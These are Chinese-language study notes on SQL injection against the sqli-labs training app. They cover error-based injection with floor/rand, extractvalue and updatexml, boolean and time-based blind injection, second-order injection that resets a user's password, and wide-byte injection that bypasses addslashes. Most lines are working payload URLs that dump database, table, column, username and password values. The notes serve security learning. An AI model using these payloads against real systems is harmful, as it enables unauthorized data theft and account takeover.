sql注入--报错注入
floor()
rand()
count()
group by() 分配初始创建一个虚拟表 分两种
第一种 第一次取数据在虚拟表中进行索引,索引未发现同类项,进行二次取数,进行写入
第二种 第一次取数据在虚拟表中进行索引,索引发现同类型,直接写入,不进行二次取数
concat()
查数据库名
?id=-1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.columns group by a %23查表名
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where
table_schema='security' limit 3,1),floor(rand(0)*2)) as a from information_schema.columns group by a %23查列名
?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand(0)*2)) as a from information_schema.columns group by a %23查字段值
?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(0)*2)) as a from information_schema.columns group by a %23extractvalue()报错
extractvalue(xml_document,xpath_string)
第一个参数是xml文档对象的名称
第二个参数是从xml文档对象中返回查询到的字符串,返回长度限制在32位字符
extractvalue(1,concat(0x7e,(select database()),0x7e))extractvalue(1,concat('~',(select database()),'~'))
xpath格式
~:十六进制0x7e
xml文档中查找字符位置时,使用/xxx/xxx/xxx/格式
只要写入不符合上述格式的内容,就会报错
updatexml()报错
updatexml(xml_target,xpath_expr,new_xml)
xml_target:xml对象的名称 string类型
xpath_expr:使用xpath格式的路径
new_xml:需要更新的内容
updatexml(1,concat('!',(select database()),'~'),1)
sql注入盲注--布尔盲注和时间盲注
布尔盲注
length()
substr()
ascii()
count()
猜测数据库长度
?id=1' and length(database())=8 --+
猜测数据库的名称
?id=1' and ascii(substr((select database()),1,1))=115 --+
猜测数据表的数量
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
猜测数据表的长度
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=5 --+
猜测数据表的名称
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117 --+
猜测字段数
?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3 --+
猜测字段名的长度
?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))=2 --+
猜测字段名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=105 --+
猜测username值的数量
?id=1' and (select count(username) from users )=13 --+
猜测username值的长度
?id=1' and length((select username from users limit 0,1))=4 --+
猜测username的值
?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+
时间盲注
if(a,b,c) 当a为真值时,执行b;当a为假值时,执行c
sleep()
猜测闭合方式
?id=1' and if(1=1,sleep(3),1) --+
sql-labs之Less-9
?id=1' and if(length(database())>7,sleep(3),1) --+
二次注入
分为两个阶段
第一阶段进行特殊字符的写入
第二阶段调用提前写入的特殊字符,完成注入过程
任意修改用户密码
update users set password=$newpass where username='$username' and password=$oldpass
$newpass $oldpass
$username=pte0618'
update users set password=$newpass where username='pte0618'#' and password=$oldpass
宽字节注入
addslashes
mysql_real_escape_string
mysql_escape_string
当字符的大小为一个字节时,称之为窄字节 例如ascii编码
当字符的大小为两个字节时,称之为宽字节 例如GB2312、GBK、GB8030
mysql使用GBK编码时,默认的会认为两个字符为一个汉字,前一个字符的ascii值大于128,达到汉字范围
'-->\'
%df'-->%df\'-->%df%5c'-->汉字'
sql-labs之Less-32
判断闭合方式
?id=1%df' and 1=2 %23
判断列数
?id=1%df' order by 3%23
查看回显位置
?id=-1%df' union select 1,2,3%23
查看库名
?id=-1%df' union select 1,database(),3%23
查看表名
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
查看列名
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 %23
查看字段值
?id=-1%df' union select 1,group_concat(id,0x3a,username,0x3a,password),3 from users %23
